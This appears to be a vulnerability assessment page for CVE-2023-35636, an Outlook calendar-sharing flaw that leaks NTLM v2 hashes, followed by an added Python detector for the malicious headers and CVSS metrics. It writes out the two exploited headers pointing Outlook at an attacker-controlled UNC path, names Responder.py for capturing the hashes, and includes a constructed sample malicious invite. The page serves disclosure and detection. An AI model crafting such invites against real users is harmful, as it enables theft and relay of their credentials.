Attacker Value: High (1 user assessed)
Exploitability: High (1 user assessed)
User Interaction: Required
Privileges Required: None
Attack Vector: Network

CVE-2023-35636

Disclosure Date: December 12, 2023
MITRE ATT&CK Tactics: Credential Access
Validation: Validated

Description

Microsoft Outlook Information Disclosure Vulnerability

Technical Analysis

Discovered by Dolev Taler from the Varonis Threat Labs team, CVE-2023-35636 is an exploit of the calendar-sharing function in Microsoft Outlook, whereby adding two headers to an email directs Outlook to share content and contact a designated machine, creating an opportunity to intercept an NTLM v2 hash.

  1. An attacker crafts an email invite to the victim, pointing the “.ICS” file path to the attacker-controlled machine. By “listening” to a self-controlled path (domain, IP, folder path, UNC, etc.), the threat actor can obtain connection attempt packets that contain the hash used to access this resource. Many tools are used to perform this listening, and in the example above, Responder.py was used (the go-to tool for every SMB and NTLM hash attack).
  2. If the victim clicks on the “Open this iCal” button inside the message, their machine will attempt to retrieve the configuration file on the attacker’s machine, exposing the victim’s NTLM hash during authentication.

Exploited headers:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics

  1. “Content-Class” = “Sharing” — This tells Outlook that this email contains sharing content.
  2. “x-sharing-config-url” = \\(Attacker machine)\a.ics — The second line points the victim’s Outlook to the attacker’s machine.

Usually, NTLM v2 should be used when attempting to authenticate against internal IP-address-based services. However, when the NTLM v2 hash is passing through the open internet, it is vulnerable to relay and offline brute-force attacks.
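The two headers named in the assessment are also a usable triage signal on a mail gateway or during incident response. What follows is an added detection example, not part of the AttackerKB entry or of Varonis' research: it parses messages with Python's standard email module and grades any message that combines Content-Class: Sharing with an x-sharing-config-url whose host lies outside the organisation, treating a UNC or file path (the pattern described above, which makes Outlook authenticate to the host) as the highest-severity case. The trusted domain suffixes, the internal address ranges and the sample messages are constructed assumptions for this example.

```python
"""Grade e-mails whose Outlook sharing headers point at an external host.

Added, hypothetical detection example (not part of the AttackerKB entry or
Varonis' research). Trusted suffixes, internal ranges and sample messages
below are constructed assumptions; fill them from real inventory.
"""
import ipaddress
import re
from email import message_from_string
from email.message import Message
from urllib.parse import urlparse

# Assumed organisation-specific allow-lists (constructed for the example).
TRUSTED_SUFFIXES = ("corp.example",)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Matches a UNC path of the form \\host\share\... and captures the host.
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")


def is_trusted_host(host: str) -> bool:
    """True for internal (RFC 1918/loopback) addresses or trusted DNS suffixes."""
    host = host.strip("[]").lower()
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: compare against the trusted domain suffixes.
        return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)
    return any(addr in net for net in INTERNAL_NETS)


def sharing_target(msg: Message):
    """Return (host, kind) from x-sharing-config-url, or None if absent.

    kind is "unc" for a \\host\path value, the URL scheme (e.g. "https",
    "file") for scheme://host values, and "unknown" otherwise.
    """
    raw = msg.get("x-sharing-config-url")
    if raw is None:
        return None
    value = " ".join(raw.split())  # unfold any folded header continuation lines
    m = UNC_RE.match(value)
    if m:
        return m.group(1), "unc"
    parsed = urlparse(value)
    if parsed.scheme and parsed.hostname:
        return parsed.hostname, parsed.scheme.lower()
    return value, "unknown"


def assess_message(raw_message: str) -> dict:
    """Classify one RFC 5322 message; severity is none, low, medium or high."""
    msg = message_from_string(raw_message)
    content_class = (msg.get("Content-Class") or "").strip().lower()
    target = sharing_target(msg)
    if target is None:
        return {"severity": "none", "reason": "no x-sharing-config-url header"}
    host, kind = target
    if content_class != "sharing":
        # Outlook only treats the message as sharing content when both headers agree.
        return {"severity": "low",
                "reason": f"x-sharing-config-url present without Content-Class: Sharing ({host})"}
    if is_trusted_host(host):
        return {"severity": "none", "reason": f"sharing config on trusted host {host}"}
    if kind in ("unc", "file"):
        return {"severity": "high",
                "reason": f"sharing config is a UNC/file path on external host {host}; "
                          "Outlook would authenticate to it"}
    return {"severity": "medium",
            "reason": f"sharing config fetched from external host {host} via {kind}"}


# Constructed sample messages (not real captures). 203.0.113.0/24 is a
# documentation range used here as a stand-in for an external host.
SAMPLE_EXTERNAL_UNC = r"""From: sender@example.net
To: victim@corp.example
Subject: Calendar invite
Content-Class: Sharing
x-sharing-config-url: \\203.0.113.10\a.ics

Open this iCal
"""

SAMPLE_INTERNAL_UNC = r"""From: colleague@corp.example
To: victim@corp.example
Subject: Team calendar
Content-Class: Sharing
x-sharing-config-url: \\fileserver.corp.example\calendars\team.ics

"""

SAMPLE_PLAIN = """From: a@example.net
To: b@corp.example
Subject: hello

no sharing headers here
"""

if __name__ == "__main__":
    for name, sample in (("external UNC", SAMPLE_EXTERNAL_UNC),
                         ("internal UNC", SAMPLE_INTERNAL_UNC),
                         ("plain", SAMPLE_PLAIN)):
        print(f"{name:13s} -> {assess_message(sample)}")
```

Run over a mailbox export or at a gateway hook, the "high" verdict is the one worth alerting on: a sharing message whose configuration path is a UNC or file location outside the internal ranges and trusted suffixes. The "medium" and "low" verdicts are there for triage context rather than alerting, since external HTTPS calendar feeds and stray headers do occur legitimately.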

CVSS V3 Severity and Metrics

Base Score: 6.5 Medium
Impact Score: 3.6
Exploitability Score: 2.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): None
Availability (A): None

General Information

Vendors

  • microsoft

Products

  • 365 apps
  • office 2016
  • office 2019
  • office long term servicing channel 2021
